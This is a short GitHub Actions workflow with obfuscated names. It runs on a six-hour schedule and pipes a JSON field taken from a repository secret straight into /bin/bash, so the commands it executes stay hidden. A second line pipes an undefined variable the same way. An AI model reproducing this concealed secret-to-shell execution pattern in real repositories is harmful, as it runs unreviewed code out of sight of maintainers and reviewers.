name: tianjiayiguo
on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tianjiayiguo
        env:
          ulm2290: ${{ secrets.ulm2290 }}
        run: |
          echo $ulm2290 | jq -r .j65428 | /bin/bash
          echo $zkopm65 | jq -r .katgx52 | /bin/bash

